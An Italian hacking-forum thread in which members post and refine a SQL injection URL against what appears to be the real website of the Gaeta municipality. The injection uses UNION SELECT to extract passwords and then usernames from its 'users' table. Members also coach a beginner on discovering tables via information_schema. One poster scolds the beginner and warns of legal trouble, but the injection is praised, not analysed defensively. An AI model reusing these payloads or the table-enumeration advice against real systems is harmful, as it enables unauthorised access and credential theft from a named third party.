comune.gaeta.it SQL Injection

[G4rr3tt]

 http://www.comune.gaeta.lt.it/comune/calendario.asp?flag=0&news=251+UNION+SELECT+1,password,3,4,5,6,7,8+FROM+users

Il sito è di un paese quasi confinante col mio.
Non sono riuscito a scovare la colonna degli username, questa è una delle mie prime SQL injection quindi siate pazienti unkmg:

 

[murdercode_imported]

sculato coll'asp XD dai vabbè

 

[imported_antru]

Good Job Man!

 

[Luke34]

ragazzi ho trovato una vulnerabilità sql injection su un sito , come la devo sfruttare ? come faccio a t5rovare le tabelle ?

 

[Robertof]

Luke34, leggi qui:
http://www.milw0rm.com/papers/202

 

[BrainStorm]

Campo trovato:

http://www.comune.gaeta.lt.it/comune/calendario.asp?flag=0&news=251+UNION+SELECT+1,password,username,4,5,6,7,8+FROM+users

 

[Luke34]

Luke34, leggi qui:
http://www.milw0rm.com/papers/202

ancora non ho capito ho provato la sql di questo sito snza guardare quella gia fatta, ma non riesco a capire

 

[RedSkull]

eh ?
quelle sono solo degli esempi...

 

[Luke34]

lo so, ma non ho capito com identificare e tabelle

 

[BrainStorm]

Per identificare le tabelle:

Brute Force + Social Engineering.

(alias culo) :temg:

 

[RedSkull]

un information_schema.tables non funziona ?

 

[Luke34]

cioè^^?

 

[RedSkull]

ecco appunto...
non l'hai neanche letto quel documento, o almeno... non l'hai capito...

 

[imported_D4nt3]

ragazzi ho trovato una vulnerabilità sql injection su un sito , come la devo sfruttare ? come faccio a t5rovare le tabelle ?

Allora.. Allora.. Cercando di stare calmi.. Caro, la gente si fa il CULO.. Per imparare.. La gente STUDIA.. Tramite google.. Si fa le ricerche.. Ci sta dietro giorni.. Mesi.. A volte ANNI.. Tu nn puoi pretendere di arrivare qui, su un Forum di WHITE HAT e chiedere solo cm si buca un sito, pensando che sia una cazzata che la si impara in 2 o 3 ore. Da quanto vedo, nn c'hai un pazzo di esperienza e vuoi già passare alle SQL Injection. Studiati prima le XSS, così per farti un'idea che è INUTILE perdere tempo solo per rubare una password di MSN.. Per rubare una fottutissima password, devi studiare le tecniche, imparare e farti un mazzo ESOSO, perché INSEGNANTI NN ESISTONO. Guardati i video tutorial piuttosto. Io nn ho chiesto un pazzo a nessuno, perché SO che la gente dice di NO alle domande che fai a loro.. Per gli stessi motivi che ti ho appena elencato. Quindi, sai cm ho fatto io? Google. Ho fatto qualche ricerca, ho letto GUIDE SU GUIDE e ho imparato. Erano tutte sbagliate, ma leggendole tutte impari correttamente. SE IO CE L'HO FATTA.. Un ragazzo normale, di 19 anni.. Ce la puoi fare pure te. È solo questione di APPLICARSI e di PASSIONE. Tu, quest'ultima, nn ce l'hai.. Si vede chiaro e tondo che vuoi fare il bullo virtuale, nn sapendo un pazzo delle leggi italiane contro noi curiosoni.. Quando poi hai problemi legali, ti metterai a piangere. Dante

@Tutti: Butei, chiamate BlackLight e fategli leggere questo Topic, per una volta sarei della sua stessa opinione. Dante